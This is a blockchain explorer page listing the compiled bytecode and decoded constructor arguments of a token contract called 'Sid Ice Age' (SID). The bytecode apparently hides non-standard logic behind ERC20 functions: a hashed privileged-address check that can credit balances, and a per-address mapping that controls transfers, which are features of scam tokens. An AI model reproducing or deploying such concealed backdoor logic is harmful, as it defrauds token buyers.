0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f1146101b057806395d89b41146101c3578063a9059cbb146101cb578063dd62ed3e146101de57600080fd5b806370a0823114610164578063715018a61461018d5780638da5cb5b1461019557600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc610217565b6040516100e99190610b33565b60405180910390f35b610105610100366004610b0a565b6102a9565b60405190151581526020016100e9565b6008545b6040519081526020016100e9565b610105610135366004610acf565b6102c0565b60075460405160ff90911681526020016100e9565b61016261015d366004610b0a565b610329565b005b610119610172366004610a83565b6001600160a01b031660009081526001602052604090205490565b610162610452565b6000546040516001600160a01b0390911681526020016100e9565b6101056101be366004610b0a565b6104b8565b6100dc610503565b6101056101d9366004610b0a565b610512565b6101196101ec366004610a9d565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b60606005805461022690610bb5565b80601f016020809104026020016040519081016040528092919081815260200182805461025290610bb5565b801561029f5780601f106102745761010080835404028352916020019161029f565b820191906000526020600020905b81548152906001019060200180831161028257829003601f168201915b5050505050905090565b60006102b6338484610532565b5060015b92915050565b60006102cd84848461065a565b61031f843361031a85604051806060016040528060298152602001610c28602991396001600160a01b038a16600090815260036020908152604080832033845290915290205491906107ed565b610532565b5060019392505050565b336001600160a01b0383166103775760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b60448201526064015b60405180910390fd5b600082116103b85760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b604482015260640161036e565b60006103c384610819565b15610414576103d2828261087a565b6103dc81846108be565b6001600160a01b038516600090815260016020526040812080549293508392909190610409908490610b86565b9091555061044c9050565b61041e828261087a565b6001600160a01b03841660009081526001602052604081208054839290610446908490610b86565b90915550505b50505050565b6000546001600160a01b031633146104ac5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161036e565b6104b660006108dd565b565b600033826104f95760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b604482015260640161036e565b61031f818561092d565b60606006805461022690610bb5565b60006102b633848461065a565b600061052b8284610b86565b9392505050565b6001600160a01b0383166105965760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161036e565b6001600160a01b0382166105f85760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b606482015260840161036e565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6106658383836109b1565b6001600160a01b0383166106ca5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b606482015260840161036e565b6001600160a01b03821661072c5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b606482015260840161036e565b61076981604051806060016040528060278152602001610c01602791396001600160a01b03861660009081526001602052604090205491906107ed565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610799908290610b86565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061064d9085815260200190565b600081848411156108115760405162461bcd60e51b815260040161036e9190610b33565b505050900390565b604080516bffffffffffffffffffffffff19606093841b81166020808401919091528351808403601401815260348401855280519082012060045490951b909116605483015282518083036048018152606890920190925280519101201490565b6001600160a01b03821660009081526001602052604090205461089e908290610b9e565b6001600160a01b0390921660009081526001602052604090209190915550565b600081156108d7576108d08284610b86565b90506102ba565b50919050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b61093682610819565b156109ad576001600160a01b0381166109835760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b604482015260640161036e565b6001600160a01b038116600081815260026020526040902080546001600160a01b03191690911790555b5050565b6001600160a01b038084166000818152600260205260408120549092161415610a24576001600160a01b0384166000908152600160205260409020546109f8908290610b86565b6001600160a01b03851660009081526001602052604090205550600854610a1f848261087a565b61044c565b6001600160a01b038416600090815260016020526040902054610a48908290610b86565b6001600160a01b03851660009081526001602052604090205550505050565b80356001600160a01b0381168114610a7e57600080fd5b919050565b600060208284031215610a94578081fd5b61052b82610a67565b60008060408385031215610aaf578081fd5b610ab883610a67565b9150610ac660208401610a67565b90509250929050565b600080600060608486031215610ae3578081fd5b610aec84610a67565b9250610afa60208501610a67565b9150604084013590509250925092565b60008060408385031215610b1c578182fd5b610b2583610a67565b946020939093013593505050565b6000602080835283518082850152825b81811015610b5f57858101830151858201604001528201610b43565b81811115610b705783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610b9957610b99610bea565b500190565b600082821015610bb057610bb0610bea565b500390565b600181811c90821680610bc957607f821691505b602082108114156108d757634e487b7160e01b600052602260045260246000fd5b634e487b7160e01b600052601160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220401ad72cfec538068d045730221c9f97b0737f26f219cd4709f43b0c7598241564736f6c63430008040033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000f7e0d99511eab452bcbbdc34285e25f10e28f79d000000000000000000000000000000000000000000000000000000517da02c00000000000000000000000000000000000000000000000000000000000000000b536964204963652041676500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000035349440000000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Sid Ice Age
Arg [1] : symbol_ (string): SID
Arg [2] : user_ (address): 0xF7E0d99511eab452bCBBdC34285E25F10E28F79D
Arg [3] : totalSupply_ (uint256): 350000000000

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000f7e0d99511eab452bcbbdc34285e25f10e28f79d
Arg [3] : 000000000000000000000000000000000000000000000000000000517da02c00
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [5] : 5369642049636520416765000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [7] : 5349440000000000000000000000000000000000000000000000000000000000


Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.